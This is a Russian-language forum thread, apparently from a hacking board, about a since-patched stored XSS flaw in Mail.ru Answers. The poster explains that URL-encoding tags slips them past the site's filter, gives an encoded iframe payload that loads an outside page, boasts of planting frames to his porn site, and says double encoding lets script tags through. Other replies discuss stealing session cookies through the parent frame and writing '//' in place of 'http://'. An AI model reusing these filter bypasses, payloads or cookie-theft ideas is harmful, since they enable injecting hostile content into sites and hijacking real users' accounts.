|
Уязвимость на Ответах Мейлру
Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru
В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы... и соответственно любой вредоносный код... примеры здесь примеры примеры примеры А также были фреймы с моим порносайтом .. но их удалили :D :D :D :mad: :mad: Собственно -рассказываю как ))) все теги фильтруются и обрезаются... с этим не поспоришь -майловцы молодцы ))) Но они упустили кое что если теги заурленкодить Можно здесь То они на мейлру уже декодируются а дальше не фильтруются!!!! и в итоге получаем .... хехех ... попробую на ачате ))) %3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод.. PHP код:
и получаем фрейм.. также можно любые теги.... кроме Код HTML:
<script> |
http://otvet.mail.ru/question/12964134/
|
Я только не очень силен в яваскрипте.... но можно ведь как то получить доступ через фрейм к родительскому окну ?
|
Жаль скрипты все таки фильтируются
|
скрпты тоже можно писать !!!!
Опять же урленкодим.... таким образом... PHP код:
PS // хмм... и кавычки можно обойти )) |
Таак... Скрипты в виде <script> </script>
тоже можно писать -требуется двойное урленкодирование Однако главная проблема -почему нельзя передать куки на скрипт .. -это то , что ссылки фильтруются -то есть если есть http -то перед ним ставятся теги <noindex> , <nofollow> и которые портят код . Если у кого есить идеи -выкладывайте |
X) X)
Все уязвимости прикрыли X) |
во первых зря то сообщил админам маила
во вторых зря что выложил баг в паблик этоже активна хсс в маил ру получить доступ к 1вому фрэйму (где авторизованные куки) через родительское окно в джаваскрипт можно так Код:
parent.имя фрэйма.document.cookie |
Цитата:
это разные домены - и получить доступ из одного домена в другой нельзя PS да может и зря... конечно...но гражданский долг меня позвал ))) |
Вместо 'http://' можешь писать просто '//'
|
| Время: 21:15 |